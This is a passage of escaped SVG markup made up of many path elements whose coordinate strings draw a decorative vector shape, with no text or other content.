d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path 